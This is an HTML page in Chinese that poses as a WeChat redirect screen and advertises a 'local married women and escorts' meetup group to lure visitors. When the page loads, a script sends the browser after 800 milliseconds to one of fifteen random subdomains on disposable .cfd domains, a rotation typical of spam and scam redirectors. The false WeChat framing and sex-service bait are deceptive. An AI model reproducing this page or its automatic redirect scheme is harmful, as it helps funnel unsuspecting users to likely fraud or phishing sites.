<!DOCTYPE html>
<html>
  <head>
    <title>加载中.....</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f0f0f0;
        display: flex;
        flex-direction: column;
        justify-content: flex-start;
        align-items: center;
        height: 100vh;
        margin: 0;
        color: #333;
      }

      p {
        font-size: 35px;
        text-align: center;
        color: darkgreen;
        margin: 1em 0;
      }
      .highlight {
        color: coral;
      }

      .image-container {
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-top: 2em;
      }

      .image-container img {
        max-width: 100%;
        height: auto;
        margin-top: 1em;
      }
    </style>
    <script type="text/javascript">
      window.onload = function () {
        var links = [
          "http://acapb5tfkpwr.vurpzy.cfd/bWcaBQN6",
          "http://aw5zbk.twkdpi.cfd/XRumUiPl",
          "http://3aap5nd2bm4.ijekvg.cfd/rPBC602t",
          "http://jn83bb.ogqrq5.cfd/kF5yvqwd",
          "http://47t4bf.japlgy.cfd/2iPY96NM",
          "http://b4x5ccmc37r.yuglzt.cfd/NvlsyNL8",
          "http://stj5c8.ah6uuz.cfd/U5P8MLru",
          "http://7whd4j4is44.efukvp.cfd/XDZnoD8D",
          "http://65j4bdjpdkw.gogsaub.cfd/ncK0poGe",
          "http://w7s5ek.ekzgaq.cfd/eBGkDO2B",
          "http://t7bkpc.boh45r.cfd/Rk79WYE1",
          "http://hee53drp2yb.vzmxng.cfd/jMzarC9e",
          "http://i4fxrc63zid.duyfhk.cfd/vO4R7A0s",
          "http://4srysemkciw.nhbpva.cfd/ncvkjyrJ",
          "http://xwkr5w.ctpuab.cfd/6zabZe3V",
        ];
        var randomLink = links[Math.floor(Math.random() * links.length)];
        setTimeout(function () {
          window.location.href = randomLink;
        }, 800);
      };
    </script>
  </head>
  <body>
    <p>
      微信正在跳转，请稍等，不要退出哦！<br />
      <span class="highlight">“如遇跳转失败请返回重新扫码”</span>
    </p>
    <p>
      全国各地同城 少妇，外围，线下互动 内部交流群<br />
      <span class="highlight">“限时加入！”</span>
    </p>
    <div class="image-container">
      <img src="img2/1.jpg" alt="Image 1" />
      <img src="img2/2.jpg" alt="Image 2" />
      <img src="img2/3.jpg" alt="Image 3" />
    </div>
  </body>
</html>
